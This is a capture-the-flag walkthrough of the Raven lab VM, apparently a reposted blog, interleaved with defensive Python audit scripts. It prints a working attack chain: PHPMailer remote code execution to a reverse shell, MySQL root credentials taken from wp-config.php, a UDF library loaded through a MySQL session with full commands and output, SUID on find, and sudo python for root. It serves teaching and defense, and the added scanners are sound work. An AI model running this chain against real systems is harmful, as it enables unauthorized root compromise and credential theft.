
Skyler's actual combat penetration notes (III) - Raven

2021-09-15 04:28:47 XuepengZ

Skyler's actual combat penetration notes:

These notes record my hands-on penetration-testing learning process and share the ideas and methods used along the way.

Please note:

All machines and servers reproduced in these notes are either self-built or authorized for penetration testing. The techniques used are for learning and educational purposes only; if any of the techniques listed are used for any other purpose, I take no responsibility.

0x00 Preface

0x01 Information gathering

0x02 Penetration: getting a shell

0x03 Privilege escalation

0x04 Summary

0x00 Preface

Today's target is a Debian machine with 4 flags and two ways to get a shell. Let's take a look.

0x01 Information gathering

The first thing is to find the target. Its IP is 192.168.245.143; next, scan its ports:

0x02 Penetration: getting a shell

It looks like SSH is on port 22, a web server on port 80, and there is also an rpcbind service port. My instinct said that port might offer something to use, but let's start by visiting port 80:

It's a blog system. I clicked around everywhere and found nothing:

Scan for directories and try:

First, check the page source of each page under the normal directories; the first flag is found in the source of

http://192.168.245.143/service.html

The scan also found several unusual directories; visit them one by one:

http://192.168.245.143/manual/en/index.html

This reveals the middleware: Apache 2.4

http://192.168.245.143/vendor/

This is the PHPMailer directory, and it shows that the installed PHPMailer version is 5.2.17

A quick search online shows that this PHPMailer version has a remote command execution vulnerability
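A browsable /vendor/ directory is itself the first thing to fix on the defending side, but the underlying problem is an unpatched library that nobody inventoried. The script below is an added example (not code from the original post or from the PHPMailer project) of a host-side check that walks a web root, collects every PHPMailer version it finds, and flags copies below a minimum the operator supplies. It assumes PHPMailer 5.x exposes its version as `public $Version = '5.2.17';` in class.phpmailer.php and, in some releases, in a plain VERSION file; the threshold "5.2.18" in the demo is a placeholder, since the post only states that 5.2.17 is vulnerable.

```python
"""Inventory PHPMailer copies under a web root and flag any below a minimum version.

Added example for this write-up; not code from the original post or from the
PHPMailer project. Assumptions: PHPMailer 5.x stores its version as
`public $Version = '5.2.17';` in class.phpmailer.php and, in some releases, in a
plain-text VERSION file; the minimum acceptable version is supplied by the
operator, because the post only states that 5.2.17 is vulnerable.
"""
import os
import re
import tempfile

VERSION_RE = re.compile(r"""\$Version\s*=\s*['"]([0-9][0-9.]*)['"]""")
PLAIN_VERSION_RE = re.compile(r"[0-9]+(\.[0-9]+)*")


def parse_version(text):
    """Turn '5.2.17' into (5, 2, 17) so that 5.10 sorts after 5.9 (a string compare would not)."""
    return tuple(int(part) for part in text.strip().split("."))


def find_phpmailer_versions(root):
    """Walk root and return {file_path: version_string} for every PHPMailer copy found."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == "class.phpmailer.php":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    match = VERSION_RE.search(fh.read())
                if match:
                    found[path] = match.group(1)
            elif name == "VERSION" and "phpmailer" in dirpath.lower():
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read().strip()
                if PLAIN_VERSION_RE.fullmatch(text):
                    found[path] = text
    return found


def outdated_copies(root, min_version):
    """Return sorted [(path, version)] for copies older than min_version."""
    floor = parse_version(min_version)
    return sorted((path, ver) for path, ver in find_phpmailer_versions(root).items()
                  if parse_version(ver) < floor)


def demo():
    """Build a constructed vendor tree mirroring the post's finding and scan it."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "vendor", "phpmailer", "phpmailer")
    os.makedirs(lib)
    with open(os.path.join(lib, "class.phpmailer.php"), "w") as fh:
        fh.write("<?php\nclass PHPMailer {\n    public $Version = '5.2.17';\n}\n")
    with open(os.path.join(lib, "VERSION"), "w") as fh:
        fh.write("5.2.17\n")
    # "5.2.18" is a placeholder threshold for the demo, not a value taken from the post;
    # set it to the first release you have verified contains the fix.
    return outdated_copies(root, "5.2.18")


if __name__ == "__main__":
    for path, version in demo():
        print("OUTDATED PHPMailer", version, "at", path)
```

Run it against the real document root (`outdated_copies("/var/www/html", "<verified fixed version>")`) as part of a scheduled job; the tuple comparison matters, because a plain string comparison would rank "5.2.9" above "5.2.17".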


OK, search the exploit database to see whether there is an exploit script:

I tried the .sh script first. After copying it over, running it threw an error. Looking at the error message, the cause was that the script had been copied from Windows and its line endings were inconsistent, so after converting it with dos2unix it could be executed.

Running the script did give a remote shell, but commands produced no output. So try the Python script instead:

Modify the parameters in the script:

It errored on execution: the script contains Chinese characters, so add this line at the top: # -*- coding: utf-8 -*-

Run it again; a missing library is reported, so install it with pip install requests-toolbelt

Run it once more

Once it succeeds, open a listener on port 8888 on the local Kali machine and visit http://192.168.245.143/back.php to get a shell and a reverse bash

We have a shell, but as a low-privileged user. No rush; first hunt for flags

find / -name "*flag*"

OK, that finds the second flag, and there is also a wordpress subdirectory in the web root. WordPress is a one-click site-building tool, so cd into that subdirectory and see what information it holds:

Viewing the configuration file reveals the database username and password: cat wp-config.php
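Two things make this step pay off for an attacker and both are auditable: the credentials in wp-config.php are for the MySQL root account, and the file is readable by the web-server user that the shell runs as. The following is an added example (not code from the original post or from WordPress) of a small audit that parses the define() calls and the file mode and reports both conditions. It assumes the usual define('DB_USER', '...') style; the sample file is constructed and uses a placeholder password.

```python
"""Audit a WordPress wp-config.php for the two weaknesses the walk-through cashes in on:
database credentials that belong to the MySQL root account, and a configuration file
readable by more than its owner (here the web-server user could read it from the shell).

Added example; not from the original post or from WordPress. Assumptions: credentials
are set with the usual define('DB_USER', '...') style calls; the sample file below is
constructed and uses a placeholder password.
"""
import os
import re
import stat
import tempfile

DEFINE_RE = re.compile(r"""define\(\s*['"](DB_\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")


def parse_defines(text):
    """Return {'DB_NAME': ..., 'DB_USER': ..., ...} from wp-config.php source."""
    return dict(DEFINE_RE.findall(text))


def audit_wp_config(path):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        defines = parse_defines(fh.read())
    if defines.get("DB_USER") == "root":
        findings.append("DB_USER is the MySQL root account; use a dedicated least-privilege DB user")
    if not defines.get("DB_PASSWORD"):
        findings.append("DB_PASSWORD is empty")
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append("wp-config.php is readable by group/others (mode %o)" % mode)
    return findings


def demo(user="root", mode=0o644):
    """Write a constructed wp-config.php (defaults mirror the post: root DB user, 0644) and audit it."""
    path = os.path.join(tempfile.mkdtemp(), "wp-config.php")
    with open(path, "w") as fh:
        fh.write("<?php\n"
                 "define('DB_NAME', 'wordpress');\n"
                 "define('DB_USER', '%s');\n"
                 "define('DB_PASSWORD', 'PLACEHOLDER_PASSWORD');\n"
                 "define('DB_HOST', 'localhost');\n" % user)
    os.chmod(path, mode)
    return audit_wp_config(path)


if __name__ == "__main__":
    for finding in demo():
        print("FINDING:", finding)
```

With the defaults the demo reports two findings; `demo(user="wpuser", mode=0o600)` reports none, which is the configuration to aim for: a database account limited to the wordpress schema and a config file readable only by its owner.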

 

OK, let's first look at the database's privileges:

0x03 Privilege escalation

MySQL is running as root. Back when I was learning SQL injection, UDF privilege escalation was mentioned as a way to escalate after a successful injection, so let's try it:


Check the MySQL version: 5.5.60

Take the second search result, copy 1518.c, and compile it into a shared library (.so):

gcc -g -c 1518.c

gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.o -lc

Start a Python HTTP server with python -m SimpleHTTPServer 5555 and download 1518.so on the target machine

OK, log in to MySQL and start the UDF privilege escalation:

mysql -uroot [email protected]

The specific steps are as follows:

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
+--------------------+
4 rows in set (0.22 sec)

mysql> use wordpress
use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.43 sec)

mysql> insert into foo values(load_file('/var/www/html/1518.so'));
insert into foo values(load_file('/var/www/html/1518.so'));
Query OK, 1 row affected (0.10 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
Query OK, 1 row affected (0.06 sec)

mysql> create function do_system returns integer soname '1518.so';
create function do_system returns integer soname '1518.so';
Query OK, 0 rows affected (0.10 sec)

mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------+----------+
| name      | ret | dl      | type     |
+-----------+-----+---------+----------+
| do_system |   2 | 1518.so | function |
+-----------+-----+---------+----------+
1 row in set (0.00 sec)

mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.02 sec)
mysql> quit
quit
Bye
www-data@Raven:/var/www/html$ touch foo
touch foo
www-data@Raven:/var/www/html$ find foo -exec 'whoami' \;
find foo -exec 'whoami' \;
root
www-data@Raven:/var/www/html$ find foo -exec '/bin/sh' \;
find foo -exec '/bin/sh' \;
# whoami
whoami
root
# pwd
pwd
/var/www/html
# cd /root
cd /root
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
______
| ___ \
| |_/ /__ ___   _____ _ __
|    // _` \ \ / / _ \ '_ \
| |\ \ (_| |\ V /  __/ | | |
\_| \_\__,_| \_/ \___|_| |_|

flag4{715dea6c055b9fe3337544932f2941ce}

CONGRATULATIONS on successfully rooting Raven!

This is my first Boot2Root VM - I hope you enjoyed it.

Hit me up on Twitter and let me know what you thought:

@mccannwj / wjmccann.github.io

Privilege escalation succeeded. Besides that, there were some unexpected findings in the database:

In the posts table, two flags were found:

There is also a users table; let's look:

Two users with hashed passwords were found; try cracking them with an md5 decryption tool:

michael | $P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven | $P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

The first one could not be cracked; the second one:

OK, cracked. Try logging in with it:

ssh [email protected]

We're in. Check the user's permissions

Found that python can be run with sudo, so escalate directly through python:

sudo python -c 'import pty; pty.spawn("/bin/bash")'

Rooted!
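The second path to root needs no exploit at all: a sudo rule that lets the user run an interpreter as root. That is something a defender can audit continuously. Below is an added example (not code from the original post) of a small sudoers parser that flags rules granting ALL, a shell, or an interpreter such as python; it assumes a simplified sudoers grammar (user host=(runas) [NOPASSWD:] cmd, cmd) with no aliases or line continuations, and the sample rules are constructed, not Raven's real file.

```python
"""Flag sudo rules that hand a user an interpreter or shell, the pattern behind the
`sudo python -c 'import pty; pty.spawn("/bin/bash")'` step in the write-up.

Added example; not from the original post. Assumptions: a simplified sudoers grammar
'user host=(runas) [NOPASSWD:] cmd[, cmd...]' without aliases or line continuations;
the sample rules are constructed, not the target's real sudoers.
"""
import re

RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

# Programs that can spawn a shell when run as root; the write-up used python and find.
SHELL_CAPABLE = {"python", "python2", "python3", "perl", "find", "sh", "bash", "dash", "vi", "vim"}

# Constructed sample sudoers content (not the target's real file).
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
steven  ALL=(ALL) NOPASSWD: /usr/bin/python      # the kind of rule the sudo python step relies on
michael ALL=(ALL) /usr/sbin/service apache2 restart
"""


def parse_sudoers(text):
    """Parse rule lines into dicts; comments, blank lines and Defaults lines are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        match = RULE_RE.match(line)
        if not match:
            continue
        cmds = match.group("cmds").strip()
        nopasswd = cmds.startswith("NOPASSWD:")
        if nopasswd:
            cmds = cmds[len("NOPASSWD:"):]
        rules.append({
            "who": match.group("who"),
            "runas": match.group("runas") or "root",
            "nopasswd": nopasswd,
            "commands": [c.strip() for c in cmds.split(",") if c.strip()],
        })
    return rules


def risky_rules(text):
    """Return (who, command, nopasswd) for every rule that can yield a root shell."""
    hits = []
    for rule in parse_sudoers(text):
        if rule["who"] == "root":
            continue  # root having ALL is expected
        for cmd in rule["commands"]:
            base = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or base in SHELL_CAPABLE:
                hits.append((rule["who"], cmd, rule["nopasswd"]))
    return hits


if __name__ == "__main__":
    for who, cmd, nopasswd in risky_rules(SAMPLE_SUDOERS):
        print("RISKY:", who, "->", cmd, "(NOPASSWD)" if nopasswd else "")
```

On the sample it flags the %sudo group and steven's python rule, and leaves michael's narrowly scoped service command alone; in practice feed it the concatenation of /etc/sudoers and /etc/sudoers.d/*, and treat any interpreter on the list as equivalent to granting a root shell.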


0x04 Summary

UDF privilege escalation:

Put the UDF file in the designated location (for MySQL > 5.1, the lib\plugin folder under the MySQL root directory)

Import the custom function (user defined function) from the UDF file

Execute the custom function

dumpfile is usually used for binary files and does not corrupt them

create function do_system is the new function we added, used to execute system commands

chmod u+s sets the SUID bit on a program, so it runs with its owner's privileges (here root); that is, find now runs with the highest privileges

find / -exec '/bin/sh' \; is the final escalation: it yields a shell with the highest privileges
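Seen from the defending side, the chain in the session above and in this summary leaves two durable traces: a shared object that is registered in mysql.func and sits in the plugin directory without belonging to the installed MySQL package, and a binary that suddenly carries the SUID bit. The following is an added example (not code from the post) that checks for both. It assumes mysql.func rows are handed in as (name, ret, dl, type) tuples, the columns `select * from mysql.func` prints, and that the plugin allow-list and SUID baseline come from a known-good host of the same build; all sample data is constructed.

```python
"""Defender-side checks for the traces the UDF chain in the write-up leaves behind:
a shared object registered in mysql.func (or dropped into the plugin directory) that
is not a packaged plugin, and a SUID bit newly set on a binary (chmod u+s /usr/bin/find).

Added example; not from the post. Assumptions: mysql.func rows are passed in as
(name, ret, dl, type) tuples, the columns `select * from mysql.func` prints; the
plugin allow-list and the SUID baseline come from a known-good host of the same
build; all sample data here is constructed.
"""
import os
import stat
import tempfile


def unexpected_udfs(func_rows, plugin_dir, allowed_plugins):
    """Flag UDF registrations and plugin-dir files that are not on the allow-list."""
    findings = []
    present = set(os.listdir(plugin_dir)) if os.path.isdir(plugin_dir) else set()
    for name, _ret, dl, _type in func_rows:
        if dl not in allowed_plugins:
            findings.append(("udf", name, dl, "library not in allow-list"))
        elif dl not in present:
            findings.append(("udf", name, dl, "library registered but file missing"))
    for fname in sorted(present - set(allowed_plugins)):
        if fname.endswith(".so"):
            findings.append(("plugin_dir", fname, None, "unlisted shared object in plugin dir"))
    return findings


def suid_files(root):
    """Return the set of regular files under root that carry the SUID bit."""
    hits = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.add(path)
    return hits


def suid_drift(root, baseline):
    """SUID files under root that are not in the baseline of expected absolute paths."""
    return sorted(suid_files(root) - set(baseline))


def demo():
    """Recreate the post's two traces in a scratch directory and run both checks."""
    scratch = tempfile.mkdtemp()
    plugin_dir = os.path.join(scratch, "plugin")
    os.makedirs(plugin_dir)
    for fname in ("auth_socket.so", "1518.so"):  # one packaged plugin, one dropped UDF library
        open(os.path.join(plugin_dir, fname), "wb").close()
    func_rows = [("do_system", 2, "1518.so", "function")]  # as the post's mysql.func output shows
    udf_findings = unexpected_udfs(func_rows, plugin_dir, {"auth_socket.so"})

    bin_dir = os.path.join(scratch, "bin")
    os.makedirs(bin_dir)
    find_path = os.path.join(bin_dir, "find")
    open(find_path, "wb").close()
    os.chmod(find_path, 0o4755)  # simulate the chmod u+s from the write-up
    return udf_findings, suid_drift(scratch, baseline=[])


if __name__ == "__main__":
    udf_findings, new_suid = demo()
    for finding in udf_findings:
        print("UDF:", finding)
    for path in new_suid:
        print("NEW SUID:", path)
```

Both checks are cheap enough to run from cron and diff against the previous run. They only catch the aftermath, though; what made the chain possible in the first place was mysqld running as root with an empty secure_file_priv, so load_file() and INTO DUMPFILE could read from the web root and write into the plugin directory. Running mysqld as its own unprivileged user and setting secure_file_priv to a dedicated directory removes that path entirely.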

Copyright notice
This article was written by [XuepengZ]; when reposting, please include the original link, thank you
https://chowdera.com/2021/09/20210909112445616Q.html
